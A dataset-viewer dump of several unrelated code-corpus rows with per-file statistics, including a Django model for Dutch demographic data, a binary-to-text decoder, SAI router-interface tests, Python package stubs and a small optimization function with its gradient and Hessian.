number_50tot55jaar_2 = models.IntegerField(db_column='50tot55jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_2 = models.IntegerField(db_column='55tot60jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_2 = models.IntegerField(db_column='60tot65jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_2 = models.IntegerField(db_column='65tot70jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_2 = models.IntegerField(db_column='70tot75jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_2 = models.IntegerField(db_column='75tot80jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_2 = models.IntegerField(db_column='80tot85jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_2 = models.IntegerField(db_column='85tot90jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_2 = models.IntegerField(db_column='90tot95jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_2 = models.IntegerField(db_column='95jaarofouder.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalpersonenmetmigratieachtergrond = models.IntegerField(db_column='Totaalpersonenmetmigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenwestersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenwestersemigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenniet_westersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenniet-westersemigratieachtergrond', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
totaalparticulierehuishoudens = models.IntegerField(db_column='Totaalparticulierehuishoudens', blank=True, null=True) # Field name made lowercase.
eenpersoonshuishoudens = models.IntegerField(db_column='Eenpersoonshuishoudens', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudenszonderkinderen = models.IntegerField(db_column='Meerpersoonshuishoudenszonderkinderen', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudensmetkinderen = models.IntegerField(db_column='Meerpersoonshuishoudensmetkinderen', blank=True, null=True) # Field name made lowercase.
gemiddeldehuishoudensgrootte = models.FloatField(db_column='Gemiddeldehuishoudensgrootte', blank=True, null=True) # Field name made lowercase.
housing_price = models.FloatField(blank=True, null=True)
transport = models.IntegerField(blank=True, null=True)
area = models.FloatField(blank=True, null=True)
transport_per_km2 = models.FloatField(blank=True, null=True)
# Model options for the inspectdb-generated 'summary' table.
class Meta:
    managed = True  # Django owns the table schema (migrations may create/alter it)
    db_table = 'summary'  # explicit table name instead of the auto-derived app_model name
| 106.462329
| 232
| 0.781034
| 4,087
| 31,087
| 5.835087
| 0.047468
| 0.101644
| 0.087219
| 0.114056
| 0.938695
| 0.932196
| 0.926577
| 0.915045
| 0.90951
| 0.901166
| 0
| 0.040945
| 0.134236
| 31,087
| 291
| 233
| 106.828179
| 0.845136
| 0.385949
| 0
| 0.754032
| 1
| 0
| 0.127303
| 0.033582
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004032
| 0.004032
| 0
| 0.883065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
878e4bdb8b7a7be746a3cd51a0329b55e4760524
| 681
|
py
|
Python
|
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
# r/dailyprogrammer challenge #202 (easy): "I AM BENDER. PLEASE INSERT GIRDER."
# Each input is ASCII text encoded as a flat string of 8-bit binary digits.
binary = '0100100001100101011011000110110001101111001000000101011101101111011100100110110001100100'
binary_test_1 = '0111000001101100011001010110000101110011011001010010000001110100011000010110110001101011001000000111010001101111001000000110110101100101'
binary_test_2 = '011011000110100101100110011001010010000001110010011010010110011101101000011101000010000001101110011011110111011100100000011010010111001100100000011011000110111101101110011001010110110001111001'
def bin2text(bin_text):
    """Decode a string of '0'/'1' digits into text, 8 bits per character."""
    decoded = []
    for start in range(0, len(bin_text), 8):
        octet = bin_text[start:start + 8]
        decoded.append(chr(int(octet, 2)))
    return ''.join(decoded)
# Decode and display each challenge input.
print(bin2text(binary))
print(bin2text(binary_test_1))
print(bin2text(binary_test_2))
| 48.642857
| 210
| 0.881057
| 49
| 681
| 12.020408
| 0.510204
| 0.067912
| 0.096774
| 0.078098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.66306
| 0.049927
| 681
| 13
| 211
| 52.384615
| 0.247295
| 0.01909
| 0
| 0
| 0
| 0
| 0.625564
| 0.625564
| 0
| 1
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0.125
| 0.25
| 0.375
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
356b35bcc99ec2a05ee2d15695ae0145fd36475e
| 9,210
|
py
|
Python
|
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from sai import SaiObjType
# (attribute name, attribute value type) pairs covering every router-interface
# attribute queried by the GET-before-SET tests below.
rif_attrs = [
    ("SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_TYPE", "sai_router_interface_type_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_PORT_ID", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_VLAN_ID", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "sai_mac_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_MTU", "sai_uint32_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "sai_packet_action_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "sai_packet_action_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "sai_uint8_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "bool")
]
# Default values observed by the GET-before-SET tests, keyed by attribute name.
rif_attrs_default = {}
# Values successfully applied by the SET tests, keyed by attribute name.
rif_attrs_updated = {}
@pytest.fixture(scope="module")
def sai_rif_obj_port(npu):
    """Create a port-type router interface (RIF) and yield its OID.

    The RIF is bound to a fresh virtual router and the NPU's first port.
    Teardown removes the RIF and the virtual router.
    """
    vrf_oid1 = npu.create(SaiObjType.VIRTUAL_ROUTER, [])
    rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
                         [
                             'SAI_ROUTER_INTERFACE_ATTR_TYPE', 'SAI_ROUTER_INTERFACE_TYPE_PORT',
                             'SAI_ROUTER_INTERFACE_ATTR_PORT_ID', npu.port_oids[0],
                             'SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID', vrf_oid1
                         ])
    yield rif_oid
    npu.remove(rif_oid)
    # Fix: the virtual router used to be leaked on teardown; remove it here
    # for symmetry with the sai_rif_obj_vlan fixture.
    npu.remove(vrf_oid1)
@pytest.fixture(scope="module")
def sai_rif_obj_vlan(npu):
    """Create a VLAN-type router interface and yield its OID.

    Teardown removes the RIF, then the virtual router, then the VLAN.
    """
    vlan = npu.create(SaiObjType.VLAN, ["SAI_VLAN_ATTR_VLAN_ID", "10"])
    vrf = npu.create(SaiObjType.VIRTUAL_ROUTER, [])
    attrs = [
        'SAI_ROUTER_INTERFACE_ATTR_TYPE', 'SAI_ROUTER_INTERFACE_TYPE_VLAN',
        'SAI_ROUTER_INTERFACE_ATTR_VLAN_ID', vlan,
        'SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID', vrf
    ]
    rif = npu.create(SaiObjType.ROUTER_INTERFACE, attrs)
    yield rif
    npu.remove(rif)
    npu.remove(vrf)
    npu.remove(vlan)
@pytest.mark.parametrize("attr,attr_type", rif_attrs)
def test_get_before_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_type):
    """GET each RIF attribute on a port RIF and record its default value."""
    status, data = npu.get_by_type(sai_rif_obj_port, attr, attr_type, do_assert=False)
    npu.assert_status_success(status)
    if status != "SAI_STATUS_SUCCESS":
        return
    rif_attrs_default[attr] = data.value()
@pytest.mark.parametrize("attr,attr_type", rif_attrs)
def test_get_before_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_type):
    """GET each RIF attribute on a VLAN RIF and record its default value."""
    status, data = npu.get_by_type(sai_rif_obj_vlan, attr, attr_type, do_assert=False)
    npu.assert_status_success(status)
    if status != "SAI_STATUS_SUCCESS":
        return
    rif_attrs_default[attr] = data.value()
# (attribute name, candidate value) pairs exercised by the SET tests; several
# attributes appear more than once to try each legal enum/bool value.
valued_attr = [
    ("SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_PORT"),
    ("SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_VLAN"),
    ("SAI_ROUTER_INTERFACE_ATTR_PORT_ID", "oid:0x0"),
    ("SAI_ROUTER_INTERFACE_ATTR_VLAN_ID", "oid:0x0"),
    ("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "00:11:11:11:11:11"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_MTU", "1500"),
    ("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "oid:0x0"),
    ("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "oid:0x0"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_COPY"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_COPY_CANCEL"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_TRAP"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_LOG"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_DENY"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_TRANSIT"),
    ("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_COPY"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_COPY_CANCEL"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_TRAP"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_LOG"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_DENY"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_TRANSIT"),
    ("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "2"),
    ("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "false"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "true"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "false")
]
@pytest.mark.parametrize("attr,attr_value", valued_attr)
def test_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_value):
    """SET each candidate attribute value on a port RIF and record successes."""
    status = npu.set(sai_rif_obj_port, [attr, attr_value], False)
    npu.assert_status_success(status)
    if status != "SAI_STATUS_SUCCESS":
        return
    rif_attrs_updated[attr] = attr_value
@pytest.mark.parametrize("attr,attr_value", valued_attr)
def test_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_value):
    """SET each candidate attribute value on a VLAN RIF and record successes."""
    status = npu.set(sai_rif_obj_vlan, [attr, attr_value], False)
    npu.assert_status_success(status)
    if status != "SAI_STATUS_SUCCESS":
        return
    rif_attrs_updated[attr] = attr_value
# Rebind rif_attrs for the GET-after-SET tests below. This shorter list
# presumably drops the create-only attributes (TYPE, PORT_ID, VLAN_ID,
# VIRTUAL_ROUTER_ID) that cannot be re-read meaningfully after SET -- TODO confirm.
rif_attrs = [
    ("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "sai_mac_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_MTU", "sai_uint32_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "sai_object_id_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "sai_packet_action_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "sai_packet_action_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "bool"),  # !
    ("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "sai_uint8_t"),
    ("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "bool"),
    ("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "bool"),
]
@pytest.mark.parametrize(
    "attr,attr_type",
    rif_attrs
)
def test_get_after_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_type):
    """Re-read each settable attribute on the *port* RIF after the SET tests.

    Bug fix: the GET previously passed ``sai_rif_obj_vlan``, which at this
    point in the module is the fixture *function object* (the fixture is not
    requested by this test), not a RIF OID. Query the port RIF fixture value
    instead.
    """
    status, data = npu.get_by_type(sai_rif_obj_port, attr, attr_type, do_assert=False)
    npu.assert_status_success(status)
@pytest.mark.parametrize("attr,attr_type", rif_attrs)
def test_get_after_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_type):
    """Re-read each settable attribute on the VLAN RIF after the SET tests."""
    status, data = npu.get_by_type(sai_rif_obj_vlan, attr, attr_type, do_assert=False)
    npu.assert_status_success(status)
| 51.452514
| 102
| 0.661021
| 1,124
| 9,210
| 4.77669
| 0.08363
| 0.234681
| 0.274912
| 0.315515
| 0.9607
| 0.957534
| 0.924381
| 0.807227
| 0.793816
| 0.763271
| 0
| 0.007866
| 0.240825
| 9,210
| 178
| 103
| 51.741573
| 0.760011
| 0.000109
| 0
| 0.49359
| 0
| 0
| 0.467579
| 0.403932
| 0
| 0
| 0.001303
| 0
| 0.064103
| 1
| 0.051282
| false
| 0
| 0.012821
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
35700b46b88d8b49162af752ad9890914f2d829b
| 131
|
py
|
Python
|
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
from .mdl_mol import _write_mdl_mol_file # noqa
from .pdb import _write_pdb_file # noqa
from .xyz import _write_xyz_file # noqa
| 32.75
| 48
| 0.793893
| 23
| 131
| 4.043478
| 0.391304
| 0.354839
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 3
| 49
| 43.666667
| 0.845455
| 0.10687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ea634b726e145e21299e415f13e961e333e091a5
| 166
|
py
|
Python
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 6
|
2018-03-06T10:16:36.000Z
|
2021-12-05T12:43:10.000Z
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-03-06T10:27:08.000Z
|
2022-01-02T15:21:27.000Z
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-01-06T16:28:31.000Z
|
2018-09-17T19:47:19.000Z
|
"""Get all leaf names API method."""
from ibsng.handler.handler import Handler
class getAllLeafNames(Handler):
    """Get all leaf names method class.

    Empty marker subclass: all behavior comes from Handler.
    """

    # NOTE(review): lowerCamelCase name presumably mirrors the remote IBSng
    # API method name -- confirm before renaming to PascalCase.
    pass
| 18.444444
| 42
| 0.704819
| 22
| 166
| 5.318182
| 0.590909
| 0.102564
| 0.17094
| 0.25641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180723
| 166
| 8
| 43
| 20.75
| 0.860294
| 0.379518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ea7d333b5381dd5ca3f8597d8f691154c06531f0
| 264
|
py
|
Python
|
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
import numpy as np
def func(V):
    """Evaluate f(x, y) = (x**2 - y)**2 + (1 - x)**2 at V = [x, y]."""
    x, y = V[0], V[1]
    return (x ** 2 - y) ** 2 + (1 - x) ** 2
def gradf(V):
    """Analytic gradient of func at V = [x, y]."""
    x, y = V[0], V[1]
    dfdx = 4 * x ** 3 - 4 * x * y + 2 * x - 2
    dfdy = 2 * (y - x ** 2)
    return np.array([dfdx, dfdy])
def hesf(V):
    """Analytic Hessian of func at V = [x, y] (symmetric 2x2 matrix)."""
    x, y = V[0], V[1]
    d2xx = 12 * x ** 2 - 4 * y + 2
    d2xy = -4 * x
    return np.array([[d2xx, d2xy], [d2xy, 2]])
| 29.333333
| 79
| 0.44697
| 65
| 264
| 1.815385
| 0.261538
| 0.152542
| 0.152542
| 0.237288
| 0.084746
| 0.084746
| 0
| 0
| 0
| 0
| 0
| 0.147982
| 0.155303
| 264
| 8
| 80
| 33
| 0.381166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.